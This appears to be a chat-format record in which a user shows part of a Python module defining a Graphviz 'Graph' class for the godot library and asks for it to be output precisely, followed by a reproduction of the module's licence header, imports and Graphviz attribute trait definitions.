\"\"\" Parses the Xdot attributes of all graph components and adds\n the components to a new canvas.\n \"\"\"\n from xdot_parser import XdotAttrParser\n\n xdot_parser = XdotAttrParser()\n canvas = self._component_default()\n\n for node in self.nodes:\n components = xdot_parser.parse_xdot_data( node._draw_ )\n canvas.add( *components )\n\n components = xdot_parser.parse_xdot_data( node._ldraw_ )\n canvas.add( *components )\n\n for edge in self.edges:\n components = xdot_parser.parse_xdot_data( edge._draw_ )\n canvas.add( *components )\n components = xdot_parser.parse_xdot_data( edge._ldraw_ )\n canvas.add( *components )\n components = xdot_parser.parse_xdot_data( edge._hdraw_ )\n canvas.add( *components )\n components = xdot_parser.parse_xdot_data( edge._tdraw_ )\n canvas.add( *components )\n components = xdot_parser.parse_xdot_data( edge._hldraw_ )\n canvas.add( *components )\n components = xdot_parser.parse_xdot_data( edge._tldraw_ )\n canvas.add( *components )\n\n self.component = canvas\n self.vp.request_redraw()\n\n\n def get_node(self, ID):\n \"\"\" Returns a node given an ID or None if no such node exists.\n \"\"\"\n node = super(Graph, self).get_node(ID)\n if node is not None:\n return node\n\n for graph in self.all_graphs:\n for each_node in graph.nodes:\n if each_node.ID == ID:\n return each_node\n else:\n return None\n\n\n# def write(self, path, prog=None, format=None):\n# \"\"\" Writes a graph to a file.\n#\n# Given a filename 'path' it will open/create and truncate\n# such file and write on it a representation of the graph\n# defined by the dot object and in the format specified by\n# 'format'.\n# The format 'raw' is used to dump the string representation\n# of the Dot object, without further processing.\n# The output can be processed by any of graphviz tools, defined\n# in 'prog', which defaults to 'dot'\n# Returns True or False according to the success of the write\n# operation.\n# \"\"\"\n#\n# if prog is None:\n# prog = self.program\n#\n# if format is None:\n# format = self.format\n#\n#\n# dot_fd = None\n# try:\n# dot_fd = open( path, \"wb\" )\n## dot_fd = file( path, \"w+b\" )\n# if format == 'raw':\n# dot_fd.write( self.to_string() )\n# else:\n# dot_fd.write( self.create( prog, format ) )\n# finally:\n# if dot_fd is not None:\n# dot_fd.close()\n#\n# return True\n\n #--------------------------------------------------------------------------\n # Trait initialisers:\n #--------------------------------------------------------------------------\n\n def _component_default(self):\n \"\"\" Trait initialiser. Overrides the base class to use a Canvas\n for the root Graph.\n \"\"\"\n return Canvas( draw_axes=True, bgcolor=\"lightsteelblue\")\n\n\n def _epsilon_default(self):\n \"\"\" Trait initialiser.\n \"\"\"\n if self.mode == \"KK\":\n return 0.0001 * len(self.nodes)\n else:\n return 0.0001\n\n\n def _maxiter_default(self):\n \"\"\" Trait initialiser.\n \"\"\"\n mode = self.mode\n if mode == \"KK\":\n return 100 * len(self.nodes)\n elif mode == \"major\":\n return 200\n else:\n return 600\n\n #--------------------------------------------------------------------------\n # Property getters:\n #--------------------------------------------------------------------------\n\n def _get_all_graphs(self):\n \"\"\" Property getter.\n \"\"\"\n top_graph = self\n\n def get_subgraphs(graph):\n assert isinstance(graph, BaseGraph)\n subgraphs = graph.subgraphs[:]\n for subgraph in graph.subgraphs:\n subsubgraphs = get_subgraphs(subgraph)\n subgraphs.extend(subsubgraphs)\n return subgraphs\n\n subgraphs = get_subgraphs(top_graph)\n return [top_graph] + subgraphs\n\n #--------------------------------------------------------------------------\n # Event handlers:\n #--------------------------------------------------------------------------\n\n def _directed_changed(self, new):\n \"\"\" Sets the connection string for all edges.\n \"\"\"\n if new:\n conn = \"->\"\n else:\n conn = \"--\"\n\n for edge in [e for g in self.all_graphs for e in g.edges]:\n edge.conn = conn\n\n\n def _on_nodes(self):\n \"\"\" Maintains each branch's list of available nodes in order that they\n may move themselves (InstanceEditor values).\n \"\"\"\n all_graphs = self.all_graphs\n all_nodes = [n for g in all_graphs for n in g.nodes]\n\n for graph in all_graphs:\n for edge in graph.edges:\n edge._nodes = all_nodes\n\n\n def _on_edges(self, object, name, old, new):\n \"\"\" Handles the list of edges for any graph changing.\n \"\"\"\n if name == \"edges_items\":\n edges = new.added\n elif name == \"edges\":\n edges = new\n else:\n edges = []\n\n all_nodes = [n for g in self.all_graphs for n in g.nodes]\n\n for each_edge in edges:\n # Ensure the edge's nodes exist in the graph.\n if each_edge.tail_node not in all_nodes:\n object.nodes.append( each_edge.tail_node )\n\n if each_edge.head_node not in all_nodes:\n object.nodes.append( each_edge.head_node )\n\n # Initialise the edge's list of available nodes.\n each_edge._nodes = all_nodes\n\n\n# def _bgcolor_changed(self, new):\n# \"\"\" Handles the canvas background colour.\n# \"\"\"\n# self.canvas.bgcolor = new\n\n#------------------------------------------------------------------------------\n# Stand-alone call:\n#------------------------------------------------------------------------------\n\nif __name__ == \"__main__\":\n import sys\n logger = logging.getLogger()\n logger.addHandler(logging.StreamHandler(sys.stdout))\n logger.setLevel(logging.DEBUG)\n\n# from godot.graph import Graph\n\n graph = Graph(ID=\"Foo\", directed=True, label=\"Foo Graph\")\n\n node1 = Node(\"node1\", label=\"Node 1\", shape=\"rectangle\")\n graph.add_node( node1 )\n\n node2 = Node(\"node2\", label=\"Node 2\")\n graph.add_node( node2 )\n\n graph.add_edge(node1, node2)\n\n\n# subgraph1 = Subgraph(ID=\"subgraph1\", rank=\"min\")\n# subgraph1.nodes.append(Node(\"node3\", label=\"Node 3\"))\n# graph.subgraphs.append(subgraph1)\n#\n# subgraph2 = Subgraph(ID=\"subgraph2\", rank=\"max\")\n# subgraph2.nodes.append(Node(\"node4\", label=\"Node 4\"))\n# subgraph1.subgraphs.append(subgraph2)\n\n# from godot.component.component_viewer import ComponentViewer\n# viewer = ComponentViewer(component=graph.component)\n# viewer.configure_traits()\n\n# graph.write(\"/tmp/graph.xdot\", \"dot\", \"xdot\")\n\n# graph.arrange_all()\n\n# print write_dot_graph(graph)\n\n graph.configure_traits()\n\n# EOF +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n```<|memory_end|>\nOutput it precisely.",
"role": "user"
}
] |
```python
#------------------------------------------------------------------------------
# Copyright (c) 2009 Richard W. Lincoln
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#------------------------------------------------------------------------------
""" Defines a representation of a graph in Graphviz's dot language.
"""
#------------------------------------------------------------------------------
# Imports:
#------------------------------------------------------------------------------
import os
import subprocess
import tempfile
import math
import logging
from enthought.traits.api import \
HasTraits, Any, Instance, Trait, Tuple, Bool, Str, Enum, Float, Color, \
Either, Range, Int, Font, List, Directory, ListInstance, This, Property, \
Dict, on_trait_change
from enthought.traits.trait_handlers import TraitListEvent
from enthought.traits.ui.api import View, Group, Item, Tabbed
from enthought.pyface.image_resource import ImageResource
from enthought.enable.api import Canvas, Viewport, Container
from enthought.enable.tools.api import ViewportPanTool, ViewportZoomTool
from enthought.enable.component_editor import ComponentEditor
from common import \
Alias, color_scheme_trait, rectangle_trait, fontcolor_trait, \
fontname_trait, fontsize_trait, label_trait, point_trait, pointf_trait, \
nojustify_trait, root_trait, showboxes_trait, target_trait, margin_trait
from godot.base_graph import BaseGraph
from godot.node import Node
from godot.edge import Edge
from godot.subgraph import Subgraph
from godot.cluster import Cluster
from godot.ui.graph_view import graph_view, tabbed_view
#------------------------------------------------------------------------------
# Logging:
#------------------------------------------------------------------------------
logger = logging.getLogger(__name__)
#------------------------------------------------------------------------------
# Trait definitions:
#------------------------------------------------------------------------------
cluster_mode_trait = Enum(
"local", "global", "none", desc="mode used for handling clusters",
label="Cluster rank", graphviz=True
)
start_trait = Enum("regular", "self", "random", graphviz=True)
#------------------------------------------------------------------------------
# "Graph" class:
#------------------------------------------------------------------------------
class Graph(BaseGraph):
""" Defines a representation of a graph in Graphviz's dot language.
"""
#--------------------------------------------------------------------------
# Trait definitions.
#--------------------------------------------------------------------------
# A strict graph is an unweighted, undirected graph containing no
# graph loops or multiple edges.
strict = Bool(False, desc="A strict graph is an unweighted, "
"undirected graph containing no graph loops or multiple edges." )
# Do edges have direction?
directed = Bool(False, desc="directed edges.")
# All graphs, subgraphs and clusters.
all_graphs = Property( List(Instance(BaseGraph)) )
#--------------------------------------------------------------------------
# Dot trait definitions.
#--------------------------------------------------------------------------
# Bounding box of drawing in integer points.
bb = rectangle_trait
# When attached to the root graph, this color is used as the background for
# entire canvas. When a cluster attribute, it is used as the initial
# background for the cluster. If a cluster has a filled
# <html:a rel="attr">style</html:a>, the
# cluster's <html:a rel="attr">fillcolor</html:a> will overlay the
# background color.
#
# If no background color is specified for the root graph, no graphics
# operation are performed on the background. This works fine for
# PostScript but for bitmap output, all bits are initialized to something.
# This means that when the bitmap output is included in some other
# document, all of the bits within the bitmap's bounding box will be
# set, overwriting whatever color or graphics where already on the page.
# If this effect is not desired, and you only want to set bits explicitly
# assigned in drawing the graph, set <html:a rel="attr">bgcolor</html:a>="transparent".
bgcolor = Color("white", desc="color used as the background for the "
"entire canvas", label="Background Color", graphviz=True)
# If true, the drawing is centered in the output canvas.
center = Bool(False, desc="is drawing centered in the output canvas",
graphviz=True)
# Specifies the character encoding used when interpreting string input
# as a text label. The default value is <html:span class="val">UTF-8</html:span>.
# The other legal value is <html:span class="val">iso-8859-1</html:span> or,
# equivalently,
# <html:span class="val">Latin1</html:span>. The <html:a rel="attr">charset</html:a> attribute is case-insensitive.
# Note that if the character encoding used in the input does not
# match the <html:a rel="attr">charset</html:a> value, the resulting output may be very strange.
charset = Str("UTF-8", label="Character encoding", graphviz=True)
# Mode used for handling clusters. If <html:a rel="attr">clusterrank</html:a> is <html:span class="val">local</html:span>, a
# subgraph whose name begins with "cluster" is given special treatment.
# The subgraph is laid out separately, and then integrated as a unit into
# its parent graph, with a bounding rectangle drawn about it.
# If the cluster has a <html:a rel="attr">label</html:a> parameter, this label
# is displayed within the rectangle.
# Note also that there can be clusters within clusters.
# At present, the modes <html:span class="val">global</html:span> and <html:span class="val">none</html:span>
# appear to be identical, both turning off the special cluster processing.
clusterrank = cluster_mode_trait
# This attribute specifies a color scheme namespace. If defined, it specifies
# the context for interpreting color names. In particular, if a
# <html:a rel="type">color</html:a> value has form <html:code>xxx</html:code> or <html:code>//xxx</html:code>,
# then the color <html:code>xxx</html:code> will be evaluated according to the current color scheme.
# If no color scheme is set, the standard X11 naming is used.
# For example, if <html:code>colorscheme=bugn9</html:code>, then <html:code>color=7</html:code>
# is interpreted as <html:code>/bugn9/7</html:code>.
colorscheme = color_scheme_trait
# Comments are inserted into output. Device-dependent.
comment = Str(desc="comments are inserted into output", graphviz=True)
# If <html:span class="val">true</html:span>, allow edges between clusters.
# (See <html:a rel="attr">lhead</html:a> and <html:a rel="attr">ltail</html:a> below.)
compound = Bool(False, desc="edges allowed between clusters",
graphviz=True)
# If <html:span class="val">true</html:span>, use edge concentrators.
concentrate = Bool(False, desc="edge concentrators", graphviz=True)
# Factor damping force motions. On each iteration, a nodes movement
# is limited to this factor of its potential motion. By being less than
# 1.0, the system tends to "cool", thereby preventing cycling.
Damping = Float(0.99, desc="factor damping force motions", graphviz=True)
# This specifies the distance between nodes in separate connected
# components. If set too small, connected components may overlap.
# Only applicable if <html:a rel="attr">pack</html:a>=false.
defaultdist = Float(desc="distance between nodes in separate connected "
"components", label="Default distance", graphviz=True)
# Set the number of dimensions used for the layout. The maximum value
# allowed is 10.
dim = Range(low=2, high=10, desc="number of dimensions for the layout",
label="Dimensions", graphviz=True)
# Only valid when mode="ipsep". If true, constraints are generated for each
# edge in the largest (heuristic) directed acyclic subgraph such that the
# edge must point downwards. If "hier", generates level constraints similar
# to those used with mode="hier". The main difference is that, in the
# latter case, only these constraints are involved, so a faster solver can
# be used.
diredgeconstraints = Enum(True, "heir", label="Edge constraints",
graphviz=True)
# This specifies the expected number of pixels per inch on a display device.
# For bitmap output, this guarantees that text rendering will be
# done more accurately, both in size and in placement. For SVG output,
# it is used to guarantee that the dimensions in the output correspond to
# the correct number of points or inches.
dpi = Float(96.0, desc="expected number of pixels per inch on a display",
label="DPI", graphviz=True)
# Terminating condition. If the length squared of all energy gradients are
# < <html:a rel="attr">epsilon</html:a>, the algorithm stops.
epsilon = Float(0.0001, desc="terminating condition", graphviz=True)
# Fraction to increase polygons (multiply
# coordinates by 1 + esep) for purposes of spline edge routing.
# This should normally be strictly less than
# <html:a rel="attr">sep</html:a>.
esep = Int(3, desc="Fraction to increase polygons (multiply coordinates "
"by 1 + esep) for purposes of spline edge routing",
label="Edge separation", graphviz=True)
# Color used for text.
fontcolor = fontcolor_trait
# Font used for text. This very much depends on the output format and, for
# non-bitmap output such as PostScript or SVG, the availability of the font
# when the graph is displayed or printed. As such, it is best to rely on
# font faces that are generally available, such as Times-Roman, Helvetica or
# Courier.
#
# If Graphviz was built using the
# <html:a href="http://pdx.freedesktop.org/~fontconfig/fontconfig-user.html">fontconfig library</html:a>, the latter library
# will be used to search for the font. However, if the <html:a rel="attr">fontname</html:a> string
# contains a slash character "/", it is treated as a pathname for the font
# file, though font lookup will append the usual font suffixes.
#
# If Graphviz does not use fontconfig, <html:a rel="attr">fontname</html:a> will be
# considered the name of a Type 1 or True Type font file.
# If you specify <html:code>fontname=schlbk</html:code>, the tool will look for a
# file named <html:code>schlbk.ttf</html:code> or <html:code>schlbk.pfa</html:code> or <html:code>schlbk.pfb</html:code>
# in one of the directories specified by
# the <html:a rel="attr">fontpath</html:a> attribute.
# The lookup does support various aliases for the common fonts.
fontname = fontname_trait
# Allows user control of how basic fontnames are represented in SVG output.
# If <html:a rel="attr">fontnames</html:a> is undefined or <html:span class="val">svg</html:span>,
# the output will try to use known SVG fontnames. For example, the
# default font <html:code>Times-Roman</html:code> will be mapped to the
# basic SVG font <html:code>serif</html:code>. This can be overridden by setting
# <html:a rel="attr">fontnames</html:a> to <html:span class="val">ps</html:span> or <html:span class="val">gd</html:span>.
# In the former case, known PostScript font names such as
# <html:code>Times-Roman</html:code> will be used in the output.
# In the latter case, the fontconfig font conventions
# are used. Thus, <html:code>Times-Roman</html:code> would be treated as
# <html:code>Nimbus Roman No9 L</html:code>. These last two options are useful
# with SVG viewers that support these richer fontname spaces.
fontnames = Enum("svg", "ps", "gd", label="Font names",
desc="how basic fontnames are represented in SVG output",
graphviz=True)
# Directory list used by libgd to search for bitmap fonts if Graphviz
# was not built with the fontconfig library.
# If <html:a rel="attr">fontpath</html:a> is not set, the environment
# variable <html:code>DOTFONTPATH</html:code> is checked.
# If that is not set, <html:code>GDFONTPATH</html:code> is checked.
# If not set, libgd uses its compiled-in font path.
# Note that fontpath is an attribute of the root graph.
fontpath = List(Directory, label="Font path", graphviz=True)
# Font size, in <html:a rel="note">points</html:a>, used for text.
fontsize = fontsize_trait
# Spring constant used in virtual physical model. It roughly corresponds to
# an ideal edge length (in inches), in that increasing K tends to increase
# the distance between nodes. Note that the edge attribute len can be used
# to override this value for adjacent nodes.
K = Float(0.3, desc="spring constant used in virtual physical model",
graphviz=True)
# Text label attached to objects.
# If a node's <html:a rel="attr">shape</html:a> is record, then the label can
# have a <html:a href="http://www.graphviz.org/doc/info/shapes.html#record">special format</html:a>
# which describes the record layout.
label = label_trait
# Justification for cluster labels. If <html:span class="val">r</html:span>, the label
# is right-justified within bounding rectangle; if <html:span class="val">l</html:span>, left-justified;
# else the label is centered.
# Note that a subgraph inherits attributes from its parent. Thus, if
# the root graph sets <html:a rel="attr">labeljust</html:a> to <html:span class="val">l</html:span>, the subgraph inherits
# this value.
labeljust = Trait("c", {"Centre": "c", "Right": "r", "Left": "l"},
desc="justification for cluster labels", label="Label justification",
graphviz=True)
# Top/bottom placement of graph and cluster labels.
# If the attribute is <html:span class="val">t</html:span>, place label at the top;
# if the attribute is <html:span class="val">b</html:span>, place label at the bottom.
# By default, root
# graph labels go on the bottom and cluster labels go on the top.
# Note that a subgraph inherits attributes from its parent. Thus, if
# the root graph sets <html:a rel="attr">labelloc</html:a> to <html:span class="val">b</html:span>, the subgraph inherits
# this value.
labelloc = Trait("b", {"Bottom": "b", "Top":"t"},
desc="placement of graph and cluster labels",
label="Label location", graphviz=True)
# If true, the graph is rendered in landscape mode. Synonymous with
# <html:code><html:a rel="attr">rotate</html:a>=90</html:code> or <html:code>
# <html:a rel="attr">orientation</html:a>=landscape</html:code>.
landscape = Bool(False, desc="rendering in landscape mode", graphviz=True)
# Specifies a linearly ordered list of layer names attached to the graph
# The graph is then output in separate layers. Only those components
# belonging to the current output layer appear. For more information,
# see the page <html:a href="http://www.graphviz.org/Documentation/html/layers/">How to use drawing layers (overlays)</html:a>.
layers = Str(desc="a linearly ordered list of layer names",
graphviz=True)
# Specifies the separator characters used to split the
# <html:a rel="attr">layers </html:a>attribute into a list of layer names.
layersep = Enum(":\t", "\t", " ", label="Layer separation",
desc="separator characters used to split layer names", graphviz=True)
# Specifies strictness of level constraints in neato
# when <html:code><html:a rel="attr">mode</html:a>="ipsep" or "hier"</html:code>.
# Larger positive values mean stricter constraints, which demand more
# separation between levels. On the other hand, negative values will relax
# the constraints by allowing some overlap between the levels.
levelsgap = Float(0.0, desc="strictness of level constraints in neato",
label="Levels gap", graphviz=True)
# Label position, in points. The position indicates the center of the
# label.
lp = point_trait
# For graphs, this sets x and y margins of canvas, in inches. If the margin
# is a single double, both margins are set equal to the given value.
#
# Note that the margin is not part of the drawing but just empty space
# left around the drawing. It basically corresponds to a translation of
# drawing, as would be necessary to center a drawing on a page. Nothing
# is actually drawn in the margin. To actually extend the background of
# a drawing, see the <html:a rel="attr">pad</html:a> attribute.
#
# For nodes, this attribute specifies space left around the node's label.
# By default, the value is <html:code>0.11,0.055</html:code>.
margin = margin_trait#Either(Float, pointf_trait, desc="x and y margins of canvas")
# Sets the number of iterations used.
maxiter = Int(200, desc="number of iterations used",
label="Maximum iterations", graphviz=True)
# Multiplicative scale factor used to alter the MinQuit (default = 8)
# and MaxIter (default = 24) parameters used during crossing
# minimization. These correspond to the
# number of tries without improvement before quitting and the
# maximum number of iterations in each pass.
mclimit = Float(1.0, desc="Multiplicative scale factor used to alter the "
"MinQuit (default = 8) and MaxIter (default = 24) parameters used "
"during crossing minimization", label="Multiplicative scale factor",
graphviz=True)
# Specifies the minimum separation between all nodes.
mindist = Float(1.0, desc="minimum separation between all nodes",
label="Minimum separation", graphviz=True)
# Technique for optimizing the layout. If <html:a rel="attr">mode</html:a> is <html:span class="val">major</html:span>,
# neato uses stress majorization. If <html:a rel="attr">mode</html:a> is <html:span class="val">KK</html:span>,
# neato uses a version of the gradient descent method. The only advantage
# to the latter technique is that it is sometimes appreciably faster for
# small (number of nodes < 100) graphs. A significant disadvantage is that
# it may cycle.
#
# There are two new, experimental modes in neato, <html:span class="val">hier</html:span>, which adds a top-down
# directionality similar to the layout used in dot, and <html:span class="val">ipsep</html:span>, which
# allows the graph to specify minimum vertical and horizontal distances
# between nodes. (See the <html:a rel="attr">sep</html:a> attribute.)
mode = Enum("major", "KK", "heir", "ipsep",
desc="Technique for optimizing the layout", graphviz=True)
# This value specifies how the distance matrix is computed for the input
# graph. The distance matrix specifies the ideal distance between every
# pair of nodes. neato attemps to find a layout which best achieves
# these distances. By default, it uses the length of the shortest path,
# where the length of each edge is given by its <html:a rel="attr">len</html:a>
# attribute. If <html:a rel="attr">model</html:a> is <html:span class="val">circuit</html:span>, neato uses the
# circuit resistance
# model to compute the distances. This tends to emphasize clusters. If
# <html:a rel="attr">model</html:a> is <html:span class="val">subset</html:span>, neato uses the subset model. This sets the
# edge length to be the number of nodes that are neighbors of exactly one
# of the end points, and then calculates the shortest paths. This helps
# to separate nodes with high degree.
model = Enum("shortpath", "circuit", "subset",
desc="how the distance matrix is computed for the input graph",
graphviz=True)
# If Graphviz is built with MOSEK defined, mode=ipsep and mosek=true,
# the Mosek software (www.mosek.com) is use to solve the ipsep constraints.
mosek = Bool(False, desc="solve the ipsep constraints with MOSEK",
graphviz=True)
# Minimum space between two adjacent nodes in the same rank, in inches.
nodesep = Float(0.25, desc="minimum space between two adjacent nodes in "
"the same rank", label="Node separation", graphviz=True)
# By default, the justification of multi-line labels is done within the
# largest context that makes sense. Thus, in the label of a polygonal node,
# a left-justified line will align with the left side of the node (shifted
# by the prescribed margin). In record nodes, left-justified line will line
# up with the left side of the enclosing column of fields. If nojustify is
# "true", multi-line labels will be justified in the context of itself. For
# example, if the attribute is set, the first label line is long, and the
# second is shorter and left-justified, the second will align with the
# left-most character in the first line, regardless of how large the node
# might be.
nojustify = nojustify_trait
# If set, normalize coordinates of final
# layout so that the first point is at the origin, and then rotate the
# layout so that the first edge is horizontal.
normalize = Bool(False, desc="If set, normalize coordinates of final "
"layout so that the first point is at the origin, and then rotate the "
"layout so that the first edge is horizontal", graphviz=True)
# Used to set number of iterations in
# network simplex applications, used in
# computing node x coordinates.
# If defined, # iterations = <html:a rel="attr">nslimit</html:a> * # nodes;
# otherwise, # iterations = MAXINT.
nslimit = Float(desc="iterations in network simplex applications",
label="x-coordinate limit", graphviz=True)
# Used to set number of iterations in
# network simplex applications, used for ranking nodes.
# If defined, # iterations = <html:a rel="attr">nslimit1</html:a> * # nodes;
# otherwise, # iterations = MAXINT.
nslimit1 = Float(desc="iterations in network simplex applications",
label="Ranking limit", graphviz=True)
# If "out" for a graph G, and n is a node in G, then edges n->* appear
# left-to-right in the same order in which they are defined.
# If "in", the edges *->n appear
# left-to-right in the same order in which they are defined for all
# nodes n.
ordering = Enum("out", "in", desc="If 'out' for a graph G, and n is a "
"node in G, then edges n->* appear left-to-right in the same order in "
"which they are defined. If 'in', the edges *->n appear left-to-right "
"in the same order in which they are defined for all nodes n.",
graphviz=True)
# These specify the order in which nodes and edges are drawn in concrete
# output. The default "breadthfirst" is the simplest, but when the graph
# layout does not avoid edge-node overlap, this mode will sometimes have
# edges drawn over nodes and sometimes on top of nodes. If the mode
# "nodesfirst" is chosen, all nodes are drawn first, followed by the
# edges. This guarantees an edge-node overlap will not be mistaken for
# an edge ending at a node. On the other hand, usually for aesthetic
# reasons, it may be desirable that all edges appear beneath nodes,
# even if the resulting drawing is ambiguous. This can be achieved by
# choosing "edgesfirst".
outputorder = Enum("breadthfirst", "nodesfirst", "edgesfirst",
desc="order in which nodes and edges are drawn", label="Output order",
graphviz=True)
# Determines if and how node overlaps should be removed. Nodes are first
# enlarged using the <html:a rel="attr">sep</html:a> attribute.
# If <html:span class="val">true</html:span>, overlaps are retained.
# If the value is <html:span class="val">scale</html:span>, overlaps are removed by uniformly scaling in x and y.
# If the value converts to <html:span class="val">false</html:span>, node overlaps are removed by a
# Voronoi-based technique.
# If the value is <html:span class="val">scalexy</html:span>, x and y are separately
# scaled to remove overlaps.
# If the value is <html:span class="val">orthoxy</html:span> or <html:span class="val">orthoyx</html:span>, overlaps
# are moved by optimizing two constraint problems, one for the x axis and
# one for the y. The suffix indicates which axis is processed first.
# If the value is <html:span class="val">ortho</html:span>, the technique is similar to <html:span class="val">orthoxy</html:span> except a
# heuristic is used to reduce the bias between the two passes.
# If the value is <html:span class="val">ortho_yx</html:span>, the technique is the same as <html:span class="val">ortho</html:span>, except
# the roles of x and y are reversed.
# The values <html:span class="val">portho</html:span>, <html:span class="val">porthoxy</html:span>, <html:span class="val">porthoxy</html:span>, and <html:span class="val">portho_yx</html:span> are similar
# to the previous four, except only pseudo-orthogonal ordering is
# enforced.
#
# If the value is <html:span class="val">compress</html:span>, the layout will be scaled down as much as
# possible without introducing any overlaps, obviously assuming there are
# none to begin with.
#
# If the value is <html:span class="val">ipsep</html:span>, and the layout is done by neato with
# <html:a rel="attr">mode</html:a>="ipsep", the overlap removal constraints are
# incorporated into the layout algorithm itself.
# N.B. At present, this only supports one level of clustering.
#
# If the value is <html:span class="val">vpsc</html:span>, overlap removal is similarly to <html:span class="val">ortho</html:span>, except
# quadratic optimization is used to minimize node displacement.
# N.B. At present, this mode only works when <html:a rel="attr">mode</html:a>="ipsep".
#
# Except for fdp, the layouts assume <html:code>overlap="true"</html:code> as the default.
# Fdp first uses a number of passes using built-in, force-directed technique
# to remove overlaps. Thus, fdp accepts <html:a rel="attr">overlap</html:a> with an integer
# prefix followed by a colon, specifying the number of tries. If there is
# no prefix, no initial tries will be performed. If there is nothing following
# a colon, none of the above methods will be attempted. By default, fdp
# uses <html:code>overlap="9:portho"</html:code>. Note that <html:code>overlap="true"</html:code>,
# <html:code>overlap="0:true"</html:code> and <html:code>overlap="0:"</html:code> all turn off all overlap
# removal.
#
# Except for the Voronoi method, all of these transforms preserve the
# orthogonal ordering of the original layout. That is, if the x coordinates
# of two nodes are originally the same, they will remain the same, and if
# the x coordinate of one node is originally less than the x coordinate of
# another, this relation will still hold in the transformed layout. The
# similar properties hold for the y coordinates.
# This is not quite true for the "porth*" cases. For these, orthogonal
# ordering is only preserved among nodes related by an edge.
#
# <html:b>NOTE</html:b>The methods <html:span class="val">orthoxy</html:span> and <html:span class="val">orthoyx</html:span> are still evolving. The semantics of these may change, or these methods may disappear altogether.
overlap = Enum("True", "False", "scale", "scalexy", "prism", "compress",
"vpsc", "ipsep", desc="determines if and how node overlaps should be "
"removed", graphviz=True)
# This is true if the value of pack is "true" or a non-negative integer.
# If true, each connected component of the graph is laid out separately,
# and then the graphs are packed tightly. If pack has an integral value,
# this is used as the size, in points, of a margin around each part;
# otherwise, a default margin of 8 is used. If pack is interpreted as
# false, the entire graph is laid out together. The granularity and method
# of packing is influenced by the packmode attribute.
#
# For layouts which always do packing, such a twopi, the pack attribute is
# just used to set the margin.
pack = Bool(graphviz=True) #Either(
# Bool, Int, desc="If true, each connected component of the graph is "
# "laid out separately, and then the graphs are packed tightly"
# )
# This indicates the granularity and method used for packing
# (cf. <html:a rel="type">packMode</html:a>). Note that defining
# <html:a rel="attr">packmode</html:a> will automatically turn on packing as though one had
# set <html:code>pack=true</html:code>.
#
# "node","clust","graph" These specify the granularity of packing connected
# components when the pack attribute is true. A value of "node" causes
# packing at the node and edge label, with no overlapping of these objects.
# This produces a layout with the least area, but it also allows
# interleaving, where a node of one component may lie between two nodes in
# another component. A value of "graph" does a packing using the bounding
# box of the component. Thus, there will be a rectangular region around a
# component free of elements of any other component. A value of "clust"
# guarantees that top-level clusters are kept intact. What effect a value
# has also depends on the layout algorithm. For example, neato does not
# support clusters, so a value of "clust" will have the same effect as the
# default "node" value.
packmode = Enum("node", "cluster", "graph", label="Pack mode",
desc="granularity and method used for packing", graphviz=True)
# The pad attribute specifies how much, in inches, to extend the
# drawing area around the minimal area needed to draw the graph.
# If the pad is a single double, both the x and y pad values are set
# equal to the given value. This area is part of the
# drawing and will be filled with the background color, if appropriate.
#
# Normally, a small pad is used for aesthetic reasons, especially when
# a background color is used, to avoid having nodes and edges abutting
# the boundary of the drawn region.
pad = Float(0.0555, desc="how much to extend the drawing area around the "
"minimal area needed to draw the graph", graphviz=True)
# Width and height of output pages, in inches. If this is set and is
# smaller than the size of the layout, a rectangular array of pages of the
# specified page size is overlaid on the layout, with origins aligned in
# the lower-left corner, thereby partitioning the layout into pages. The
# pages are then produced one at a time, in pagedir order.
#
# At present, this only works for PostScript output. For other types of
# output, one should use another tool to split the output into multiple
# output files. Or use the viewport to generate multiple files.
page = pointf_trait
# If the <html:a rel="attr">page</html:a> attribute is set and applicable,
# this attribute specifies the order in which the pages are emitted.
# This is limited to one of the 8 row or column major orders.
pagedir = Enum("BL", "BR", "TL", "TR", "RB", "RT", "LB", "LT",
desc="If the page attribute is set and applicable, this attribute "
"specifies the order in which the pages are emitted",
label="Page direction", graphviz=True)
# If <html:a rel="attr">quantum</html:a> > 0.0, node label dimensions
# will be rounded to integral multiples of the quantum.
quantum = Float(0.0, desc="If quantum > 0.0, node label dimensions will "
"be rounded to integral multiples of the quantum.", graphviz=True)
# Sets direction of graph layout. For example, if <html:a rel="attr">rankdir</html:a>="LR",
# and barring cycles, an edge <html:code>T -> H;</html:code> will go
# from left to right. By default, graphs are laid out from top to bottom.
rankdir = Enum("TB", "LR", "BT", "RL", desc="direction of graph layout",
label="Rank direction", graphviz=True)
# In dot, this gives the desired rank separation, in inches. This is
# the minimum vertical distance between the bottom of the nodes in one
# rank and the tops of nodes in the next. If the value
# contains "equally", the centers of all ranks are spaced equally apart.
# Note that both
# settings are possible, e.g., ranksep = "1.2 equally".
# In twopi, specifies radial separation of concentric circles.
ranksep = Float(0.5, desc="In dot, this gives the desired rank "
"separation. In twopi, specifies radial separation of concentric "
"circles", label="Rank separation", graphviz=True)
# Sets the aspect ratio (drawing height/drawing width) for the drawing.
# Note that this is adjusted before the size attribute constraints are
# enforced.
#
# If ratio is numeric, it is taken as the desired aspect ratio. Then, if
# the actual aspect ratio is less than the desired ratio, the drawing
# height is scaled up to achieve the desired ratio; if the actual ratio is
# greater than that desired ratio, the drawing width is scaled up.
#
# If ratio = "fill" and the size attribute is set, node positions are
# scaled, separately in both x and y, so that the final drawing exactly
# fills the specified size.
#
# If ratio = "compress" and the size attribute is set, dot attempts to
# compress the initial layout to fit in the given size. This achieves a
# tighter packing of nodes but reduces the balance and symmetry. This
# feature only works in dot.
#
